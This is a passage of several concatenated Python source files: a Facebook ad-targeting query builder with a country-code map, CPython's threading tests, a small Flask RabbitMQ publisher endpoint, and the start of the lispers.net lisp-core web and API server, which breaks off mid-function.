if segment_type == constants.INPUT_BEHAVIOR_FIELD:
if len(targeting['flexible_spec']) == 1:
targeting['flexible_spec'].append({api_field_name: []})
targeting['flexible_spec'][1][api_field_name].append({"id": id_and})
else:
targeting["flexible_spec"].append({segment_type: {"id": id_and}})
if "not" in input_value:
if not "exclusions" in targeting:
targeting["exclusions"] = {}
if not api_field_name in list(targeting["exclusions"].keys()):
targeting["exclusions"][api_field_name] = []
for id_not in input_value["not"]:
targeting["exclusions"][api_field_name].append({"id": id_not})
if "and_ors" in input_value:
for or_ids in input_value["and_ors"]:
or_query = []
for or_id in or_ids:
or_query.append({"id": or_id})
targeting["flexible_spec"].append({segment_type: or_query})
if "or" not in input_value and "and" not in input_value and "not" not in input_value and "and_ors" not in input_value:
raise JsonFormatException("Something wrong with: " + str(input_value))
def get_interests_by_group_to_AND(input_data_json, groups_ids):
interests_by_group_to_AND = {}
for group_id in groups_ids:
interests_by_group_to_AND[group_id] = []
for interest_input in input_data_json[constants.INPUT_INTEREST_FIELD]:
if interest_input:
if constants.GROUP_ID_FIELD in interest_input:
interest_group_id = interest_input[constants.GROUP_ID_FIELD]
if interest_group_id in interests_by_group_to_AND:
interests_by_group_to_AND[interest_group_id].append(interest_input)
return interests_by_group_to_AND
def select_advance_targeting_type_array_integer(segment_type, input_value, targeting):
api_field_name = get_api_field_name(segment_type)
if input_value:
if "or" in input_value:
targeting["flexible_spec"].append({api_field_name: input_value["or"]})
elif "not" in input_value:
if not "exclusions" in targeting:
targeting["exclusions"] = {}
if not api_field_name in list(targeting["exclusions"].keys()):
targeting["exclusions"][api_field_name] = []
for value in input_value["not"]:
targeting["exclusions"][api_field_name].append(value)
else:
raise JsonFormatException("Something wrong with: " + str(input_value))
def select_advance_targeting_fields(targeting, input_combination_dictionary):
# Selecting Advance Targeting
targeting["flexible_spec"] = []
for advance_field in constants.ADVANCE_TARGETING_FIELDS_TYPE_ARRAY_IDS:
if advance_field in input_combination_dictionary:
select_advance_targeting_type_array_ids(advance_field, input_combination_dictionary[advance_field],
targeting)
for advance_field in constants.ADVANCE_TARGETING_FIELDS_TYPE_ARRAY_INTEGER:
if advance_field in input_combination_dictionary:
select_advance_targeting_type_array_integer(advance_field, input_combination_dictionary[advance_field],
targeting)
return targeting
def select_publisher_platform(targeting, input_data):
# Selecting Publisher Platform
platform = constants.PUBLISHER_PLATFORM_DEFAULT
if constants.API_PUBLISHER_PLATFORMS_FIELD in input_data:
platform = input_data[constants.API_PUBLISHER_PLATFORMS_FIELD]
targeting[constants.API_PUBLISHER_PLATFORMS_FIELD] = platform
def build_targeting(current_combination, input_data):
targeting = {}
input_combination_dictionary = dict(current_combination)
select_common_fields_in_targeting(targeting, input_combination_dictionary)
select_advance_targeting_fields(targeting, input_combination_dictionary)
select_publisher_platform(targeting, input_data)
return targeting
def get_token_and_account_number_or_wait():
if not "used_tokens_time_map" in globals():
global used_tokens_time_map
used_tokens_time_map = {}
while True:
for token, account in constants.TOKENS:
if token in used_tokens_time_map:
last_used_time = used_tokens_time_map[token]
time_since_used = time.time() - last_used_time
if time_since_used > constants.SLEEP_TIME:
used_tokens_time_map[token] = time.time()
return token, account
else:
used_tokens_time_map[token] = time.time()
return token, account
time.sleep(1)
def print_collecting_progress(uncomplete_df, df):
full_size = len(df)
uncomplete_df_size = len(uncomplete_df)
print_info(
"Collecting... Completed: {:.2f}% , {:d}/{:d}".format((float(full_size - uncomplete_df_size) / full_size * 100),
full_size - uncomplete_df_size, full_size))
def send_dumb_query(token, account):
try:
row = pd.Series()
row[constants.TARGETING_FIELD] = constants.DEFAULT_DUMB_TARGETING
call_request_fb(row, token, account)
except Exception as error:
print_warning("Token or Account Number Error:")
print_warning("Token:" + token)
print_warning("Account:" + account)
raise error
def from_FB_polygons_to_KML(poly):
out = ""
for p in poly:
out += "<Polygon><outerBoundaryIs><LinearRing><coordinates>"
for pair in p:
out += " %s,%s" % (pair["lng"], pair["lat"])
out += "</coordinates></LinearRing></outerBoundaryIs></Polygon>"
return out
def double_country_conversion(input):
mapping = {
"AD": "Andorra",
"AE": "United Arab Emirates",
"AF": "Afghanistan",
"AG": "Antigua and Barbuda",
"AL": "Albania",
"AM": "Armenia",
"AO": "Angola",
"AR": "Argentina",
"AS": "American Samoa",
"AT": "Austria",
"AU": "Australia",
"AW": "Aruba",
"AZ": "Azerbaijan",
"BA": "Bosnia and Herzegovina",
"BB": "Barbados",
"BD": "Bangladesh",
"BE": "Belgium",
"BF": "Burkina Faso",
"BG": "Bulgaria",
"BH": "Bahrain",
"BI": "Burundi",
"BJ": "Benin",
"BM": "Bermuda",
"BN": "Brunei",
"BO": "Bolivia",
"BR": "Brazil",
"BS": "Bahamas",
"BT": "Bhutan",
"BW": "Botswana",
"BY": "Belarus",
"BZ": "Belize",
"CA": "Canada",
"CD": "Congo Dem. Rep.",
"CF": "Central African Republic",
"CG": "Congo Rep.",
"CH": "Switzerland",
"CI": "Cote d'Ivoire",
"CK": "Cook Islands",
"CL": "Chile",
"CM": "Cameroon",
"CN": "China",
"CO": "Colombia",
"CR": "Costa Rica",
"CV": "Cape Verde",
"CW": "Curacao",
"CY": "Cyprus",
"CZ": "Czech Republic",
"DE": "Germany",
"DJ": "Djibouti",
"DK": "Denmark",
"DM": "Dominica",
"DO": "Dominican Republic",
"DZ": "Algeria",
"EC": "Ecuador",
"EE": "Estonia",
"EG": "Egypt",
"EH": "Western Sahara",
"ER": "Eritrea",
"ES": "Spain",
"ET": "Ethiopia",
"FI": "Finland",
"FJ": "Fiji",
"FK": "Falkland Islands",
"FM": "Micronesia",
"FO": "Faroe Islands",
"FR": "France",
"GA": "Gabon",
"GB": "United Kingdom",
"GD": "Grenada",
"GE": "Georgia",
"GF": "French Guiana",
"GG": "Guernsey",
"GH": "Ghana",
"GI": "Gibraltar",
"GL": "Greenland",
"GM": "Gambia",
"GN": "Guinea-Bissau",
"GP": "Guadeloupe",
"GQ": "Equatorial Guinea",
"GR": "Greece",
"GT": "Guatemala",
"GU": "Guam",
"GW": "Guinea",
"GY": "Guyana",
"HK": "Hong Kong",
"HN": "Honduras",
"HR": "Croatia",
"HT": "Haiti",
"HU": "Hungary",
"ID": "Indonesia",
"IE": "Ireland",
"IL": "Israel",
"IM": "Isle of Man",
"IN": "India",
"IQ": "Iraq",
"IR": "Iran",
"IS": "Iceland",
"IT": "Italy",
"JE": "Jersey",
"JM": "Jamaica",
"JO": "Jordan",
"JP": "Japan",
"KE": "Kenya",
"KG": "Kyrgyzstan",
"KH": "Cambodia",
"KI": "Kiribati",
"KM": "Comoros",
"KN": "Saint Kitts and Nevis",
"KR": "South Korea",
"KW": "Kuwait",
"KY": "Cayman Islands",
"KZ": "Kazakhstan",
"LA": "Laos",
"LB": "Lebanon",
"LC": "Saint Lucia",
"LI": "Liechtenstein",
"LK": "Sri Lanka",
"LR": "Liberia",
"LS": "Lesotho",
"LT": "Lithuania",
"LU": "Luxembourg",
"LV": "Latvia",
"LY": "Libya",
"MA": "Morocco",
"MC": "Monaco",
"MD": "Moldova",
"ME": "Montenegro",
"MF": "Saint Martin",
"MG": "Madagascar",
"MH": "Marshall Islands",
"MK": "Macedonia",
"ML": "Mali",
"MM": "Myanmar",
"MN": "Mongolia",
"MO": "Macau",
"MP": "Northern Mariana Islands",
"MQ": "Martinique",
"MR": "Mauritania",
"MS": "Montserrat",
"MT": "Malta",
"MU": "Mauritius",
"MV": "Maldives",
"MW": "Malawi",
"MX": "Mexico",
"MY": "Malaysia",
"MZ": "Mozambique",
"NA": "Namibia",
"NC": "New Caledonia",
"NE": "Niger",
"NF": "Norfolk Island",
"NG": "Nigeria",
"NI": "Nicaragua",
"NL": "Netherlands",
"NO": "Norway",
"NP": "Nepal",
"NR": "Nauru",
"NU": "Niue",
"NZ": "New Zealand",
"OM": "Oman",
"PA": "Panama",
"PE": "Peru",
"PF": "French Polynesia",
"PG": "Papua New Guinea",
"PH": "Philippines",
"PK": "Pakistan",
"PL": "Poland",
"PM": "Saint Pierre and Miquelon",
"PN": "Pitcairn",
"PR": "Puerto Rico",
"PS": "Palestine",
"PT": "Portugal",
"PW": "Palau",
"PY": "Paraguay",
"QA": "Qatar",
"RE": "Reunion",
"RO": "Romania",
"RS": "Serbia",
"RU": "Russia",
"RW": "Rwanda",
"SA": "Saudi Arabia",
"SB": "Solomon Islands",
"SC": "Seychelles",
"SE": "Sweden",
"SG": "Singapore",
"SH": "Saint Helena",
"SI": "Slovenia",
"SJ": "Svalbard and Jan Mayen",
"SK": "Slovakia",
"SL": "Sierra Leone",
"SM": "San Marino",
"SN": "Senegal",
"SO": "Somalia",
"SR": "Suriname",
"SS": "South Sudan",
"ST": "Sao Tome and Principe",
"SV": "El Salvador",
"SY": "Syria",
"SX": "Sint Maarten",
"SZ": "Swaziland",
"TC": "Turks and Caicos Islands",
"TD": "Chad",
"TG": "Togo",
"TH": "Thailand",
"TJ": "Tajikistan",
"TK": "Tokelau",
"TL": "Timor-Leste",
"TM": "Turkmenistan",
"TN": "Tunisia",
"TO": "Tonga",
"TR": "Turkey",
"TT": "Trinidad and Tobago",
"TV": "Tuvalu",
"TW": "Taiwan",
"TZ": "Tanzania",
"UA": "Ukraine",
"UG": "Uganda",
"US": "United States",
"UY": "Uruguay",
"UZ": "Uzbekistan",
"VC": "Saint Vincent and the Grenadines",
"VE": "Venezuela",
"VG": "British Virgin Islands",
"VI": "US Virgin Islands",
"VN": "Vietnam",
"VU": "Vanuatu",
"WF": "Wallis and Futuna",
"WS": "Samoa",
"XK": "Kosovo",
"YE": "Yemen",
"YT": "Mayotte",
"ZA": "South Africa",
"ZM": "Zambia",
"ZW": "Zimbabwe",
}
if input in mapping:
return mapping[input]
inverted = dict(zip(mapping.values(), mapping.keys()))
if input in inverted:
return inverted[input]
return None
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import sys
import threading
import thread
import time
import unittest
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() * 2
if verbose:
print 'task', self.getName(), 'will run for', delay, 'sec'
self.sema.acquire()
self.mutex.acquire()
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
self.mutex.release()
time.sleep(delay)
if verbose:
print 'task', self.getName(), 'done'
self.mutex.acquire()
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print self.getName(), 'is finished.', self.nrunning.get(), \
'tasks are running'
self.mutex.release()
self.sema.release()
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.isAlive())
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.setDaemon(True) # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
for i in xrange(1, 1000):
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.currentThread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.currentThread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
' due to known OS bugs on'), sys.platform
return
script = """if 1:
main_thread = threading.currentThread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def test_main():
test.test_support.run_unittest(ThreadTests,
ThreadJoinOnShutdown)
if __name__ == "__main__":
test_main()
|
__init__.py
|
import json
import logging
import time
from .config import Config
from .publisher import Publisher
from .consumer import Consumer
from multiprocessing import Process
from flask import Flask, request, jsonify
from flask import Flask, request, Response
logger = logging.getLogger('GW: RabbitMQ app')
def create_app():
app = Flask(__name__)
app.config.from_object(Config)
@app.route("/publish", methods=['POST'])
def mq_service():
try:
logger.info("Inside publish function")
data = request.json
"""
To publish file in rabbit mq and call receiver
"""
file_name = data.get("file_name", None)
bucket_name = data.get("bucket_name", None)
logger.info(f"file_name : {file_name}")
logger.info(f"bucket_name : {bucket_name}")
publisher = Process(target=Publisher.run,args=(bucket_name,file_name))
publisher.start()
consumer = Process(target=Consumer.run)
consumer.start()
ret = {"err": "none"}
except Exception as error:
ret = {"err": error}
logger.error(f'main: error {error}')
else:
return Response(json.dumps(ret), mimetype='application/json')
return app
|
lisp-core.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_pyopenssl import pyOpenSSLAdapter
#from OpenSSL import SSL
import json
import sys
import socket
import thread
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_build_date = ""
lisp_control_listen_socket = None
lisp_ipc_socket = None
lisp_ipc_control_socket = None
lisp_sockets = [None, None, None]
lisp_encap_socket = None
#------------------------------------------------------------------------------
#
# lisp_api_get
#
# Ask the LISP subsystem for configuration information.
#
@bottle.route('/lisp/api', method="get")
@bottle.route('/lisp/api/<command>', method="get")
@bottle.route('/lisp/api/<command>/<data_structure>', method="get")
def lisp_api_get(command = "", data_structure=""):
data = [{ "?" : [{"?" : "not-auth"}] }]
#
# Authenticate.
#
if (bottle.request.auth != None):
username, pw = bottle.request.auth
if (lispconfig.lisp_find_user_account(username, pw) == False):
return(json.dumps(data))
#endif
else:
if (bottle.request.headers["User-Agent"].find("python") != -1):
return(json.dumps(data))
#endif
if (lispconfig.lisp_validate_user() == False):
return(json.dumps(data))
#endif
#endif
#
# First check for dynamic data. That is go get data from appropriate
# process. Return from process in JSON format.
#
if (command == "data" and data_structure != ""):
jdata = bottle.request.body.readline()
data = json.loads(jdata) if jdata != "" else ""
if (data != ""): data = data.values()[0]
if (data == []): data = ""
if (type(data) == dict and type(data.values()[0]) == dict):
data = data.values()[0]
#endif
data = lisp_get_api_data(data_structure, data)
return(data)
#endif
#
# A valid user can access data now.
#
if (command != ""):
command = "lisp " + command
else:
jdata = bottle.request.body.readline()
if (jdata == ""):
data = [{ "?" : [{"?" : "no-body"}] }]
return(json.dumps(data))
#endif
data = json.loads(jdata)
command = data.keys()[0]
#endif
data = lispconfig.lisp_get_clause_for_api(command)
return(json.dumps(data))
#enddef
#
# lisp_get_api_system
#
# Return system information in dictionary array (JSON format).
#
def lisp_get_api_system():
data = {}
data["hostname"] = socket.gethostname()
data["system-uptime"] = commands.getoutput("uptime")
data["lisp-uptime"] = lisp.lisp_print_elapsed(lisp.lisp_uptime)
data["lisp-version"] = lisp.lisp_version
yesno = "yes" if os.path.exists("./logs/lisp-traceback.log") else "no"
data["traceback-log"] = yesno
v4 = lisp.lisp_myrlocs[0]
v6 = lisp.lisp_myrlocs[1]
v4 = "none" if (v4 == None) else v4.print_address_no_iid()
v6 = "none" if (v6 == None) else v6.print_address_no_iid()
data["lisp-rlocs"] = [v4, v6]
return(json.dumps(data))
#enddef
#
# lisp_get_api_data
#
# Send IPC message to process that owns the dynamic data strucutre we
# are retrieving via the API. Variable data for the 'map-cache' and
# 'site-cache' API contains:
#
# { "eid-prefix" : <eid>, "group-prefix" : <group>, "instance-id" : <iid> }
#
# For 'map-resolver' and 'map-server" API contains:
#
# { "address" : <address>" } or { "dns-name" : <dns-name> }
#
def lisp_get_api_data(data_structure, data):
valid_apis = ["site-cache", "map-cache", "system", "map-resolver",
"map-server", "database-mapping"]
if (data_structure not in valid_apis): return(json.dumps([]))
#
# lisp-core process handles the system lispapi.get_system() API.
#
if (data_structure == "system"): return(lisp_get_api_system())
#
# Build IPC, acquire lock, and send IPC message. Then wait.
#
if (data != ""): data = json.dumps(data)
ipc = lisp.lisp_api_ipc("lisp-core", data_structure + "%" + data)
if (data_structure in ["map-cache", "map-resolver"]):
if (lisp.lisp_is_running("lisp-rtr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-rtr")
elif (lisp.lisp_is_running("lisp-itr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
else:
return(json.dumps([]))
#endif
#endif
if (data_structure in ["map-server", "database-mapping"]):
if (lisp.lisp_is_running("lisp-etr")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
else:
return(json.dumps([]))
#endif
#endif
if (data_structure == "site-cache"):
if (lisp.lisp_is_running("lisp-ms")):
lisp.lisp_ipc_lock.acquire()
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-ms")
else:
return(json.dumps([]))
#endif
#endif
lisp.lprint("Waiting for api get-data '{}', parmameters: '{}'".format( \
data_structure, data))
opcode, source, port, output = lisp.lisp_receive(lisp_ipc_socket, True)
lisp.lisp_ipc_lock.release()
return(output)
#enddef
#
# lisp_api_put_delete
#
# Tell the LISP subsystem to add/replace or remove a command clause.
#
@bottle.route('/lisp/api', method="put")
@bottle.route('/lisp/api/<command>', method="put")
@bottle.route('/lisp/api/<command>', method="delete")
def lisp_api_put_delete(command = ""):
data = [{ "?" : [{"?" : "not-auth"}] }]
if (bottle.request.auth == None): return(data)
#
# Authenticate.
#
if (bottle.request.auth != None):
username, pw = bottle.request.auth
if (lispconfig.lisp_find_user_account(username, pw) == False):
return(json.dumps(data))
#endif
else:
if (bottle.request.headers["User-Agent"].find("python") != -1):
return(json.dumps(data))
#endif
if (lispconfig.lisp_validate_user() == False):
return(json.dumps(data))
#endif
#endif
#
# If the request is to add, change, or remove a "user-account" command,
# the validated user must be configured as a superuser.
#
if (command == "user-account"):
if (lispconfig.lisp_is_user_superuser(username) == False):
data = [{ "user-account" : [{"?" : "not-auth"}] }]
return(json.dumps(data))
#endif
#endif
#
# A valid user can access data now.
#
jdata = bottle.request.body.readline()
if (jdata == ""):
data = [{ "?" : [{"?" : "no-body"}] }]
return(json.dumps(data))
#endif
data = json.loads(jdata)
if (command != ""):
command = "lisp " + command
else:
command = data[0].keys()[0]
#endif
#
# Add, replace, or remove lines from configuration file. Grab config
# file lock.
#
lisp.lisp_ipc_lock.acquire()
if (bottle.request.method == "DELETE"):
data = lispconfig.lisp_remove_clause_for_api(data)
else:
data = lispconfig.lisp_put_clause_for_api(data)
#endif
lisp.lisp_ipc_lock.release()
return(json.dumps(data))
#enddef
#
# lisp_show_api_doc
#
@bottle.route('/lisp/show/api-doc', method="get")
def lisp_show_api_doc():
if (os.path.exists("lispapi.py")): os.system("pydoc lispapi > lispapi.txt")
if (os.path.exists("lispapi.txt") == False):
return("lispapi.txt file not found")
#endif
return(bottle.static_file("lispapi.txt", root="./"))
#enddef
#
# lisp_show_command_doc
#
@bottle.route('/lisp/show/command-doc', method="get")
def lisp_show_comamnd_doc():
return(bottle.static_file("lisp.config.example", root="./",
mimetype="text/plain"))
#enddef
#
# lisp_show_lisp_xtr
#
# Display the show-xtr file that the go data-plane lisp-xtr writes to.
#
@bottle.route('/lisp/show/lisp-xtr', method="get")
def lisp_show_lisp_xtr():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Special case to look for a other data-planes. If it does not exist, check
# the lispers.net go data-plane.
#
if (os.path.exists("./show-ztr")):
f = open("./show-ztr", "r"); lines = f.read(); f.close()
else:
f = open("./show-xtr", "r"); lines = f.read(); f.close()
#endif
new = ""
lines = lines.split("\n")
for line in lines:
if (line[0:4] == " "): new += lisp.lisp_space(4)
if (line[0:2] == " "): new += lisp.lisp_space(2)
new += line + "<br>"
#endfor
new = lisp.convert_font(new)
return(lisp.lisp_print_sans(new))
#enddef
#
# lisp_show_keys
#
# Display LISP crypto-key-list to ITR, ETR, RTR.
#
@bottle.route('/lisp/show/<xtr>/keys', method="get")
def lisp_show_keys(xtr):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
superuser = lispconfig.lisp_is_user_superuser(None)
if (superuser == False):
output = "Permission denied"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
if (xtr not in ["itr", "etr", "rtr"]):
output = "Invalid URL"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
command = "show {}-keys".format(xtr)
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_geo_map
#
# Use Google Maps API to draw a circle on a geographical map. The html file
# ./lispers.net-geo.html is javascript to call the Google API.
#
@bottle.route('/lisp/geo-map/<geo_prefix>')
def lisp_show_geo_map(geo_prefix):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
geo_prefix = geo_prefix.split("-")
geo_prefix = "-".join(geo_prefix[0:-1]) + "/" + geo_prefix[-1]
geo = lisp.lisp_geo("")
geo.parse_geo_string(geo_prefix)
lat, lon = geo.dms_to_decimal()
radius = geo.radius * 1000
r = open("./lispers.net-geo.html", "r"); html = r.read(); r.close()
html = html.replace("$LAT", str(lat))
html = html.replace("$LON", str(lon))
html = html.replace("$RADIUS", str(radius))
return(html)
#enddef
#
# lisp_core_login_page
#
# Print to browser landing page.
#
@bottle.route('/lisp/login', method="get")
def lisp_core_login_page():
return(lispconfig.lisp_login_page())
#enddef
#
# lisp_core_do_login
#
# Get login info entered in forms data. Validate and add to cookie database.
# If valid, take user to landing page. Othereise, go back to login page.
#
@bottle.route('/lisp/login', method="post")
def lisp_core_do_login():
if (lispconfig.lisp_validate_user()):
return(lispconfig.lisp_landing_page())
#endif
return(lisp_core_login_page())
#enddef
#
# lisp_core_landing_page
#
# Print to browser landing page.
#
@bottle.route('/lisp')
def lisp_core_landing_page():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_landing_page())
#enddef
#
# lisp_core_traceback_page
#
# Look in log files for Traceback messages.
#
@bottle.route('/lisp/traceback')
def lisp_core_traceback_page():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
clean = True
#
# Check explicit lisp-traceback.log.
#
if (os.path.exists("./logs/lisp-traceback.log")):
output = commands.getoutput("cat ./logs/lisp-traceback.log")
if (output):
output = output.replace("----------", "<b>----------</b>")
output = output.replace("\n", "<br>")
clean = False
#endif
#endif
#
# Look for Traceback messages in log files.
#
if (clean):
output = ""
cmd = "egrep --with-filename Traceback ./logs/*.log"
log_files = commands.getoutput(cmd)
log_files = log_files.split("\n")
for lf in log_files:
if (lf.find(":") == -1): continue
line = lf.split(":")
if (line[1] == "0"): continue
output += "Found Tracebacks in log file {}<br>".format(line[0])
clean = False
#endfor
output = output[0:-4]
#endif
if (clean):
output = "No Tracebacks found - a stable system is a happy system"
#endif
output = lisp.lisp_print_cour(output)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_core_not_supported
#
# Print to browser landing page.
#
@bottle.route('/lisp/show/not-supported')
def lisp_core_not_supported():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_not_supported())
#enddef
#
# lisp_show_status_command
#
# Show some version and system info.
#
@bottle.route('/lisp/show/status')
def lisp_show_status_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Do not print out "show configuration" button or the debug drop-down menu.
#
output = ""
superuser = lispconfig.lisp_is_user_superuser(None)
if (superuser):
sc = lisp.lisp_button("show configuration", "/lisp/show/conf")
dc = lisp.lisp_button("show configuration diff", "/lisp/show/diff")
ac = lisp.lisp_button("archive configuration", "/lisp/archive/conf")
cc = lisp.lisp_button("clear configuration", "/lisp/clear/conf/verify")
lf = lisp.lisp_button("log flows", "/lisp/log/flows")
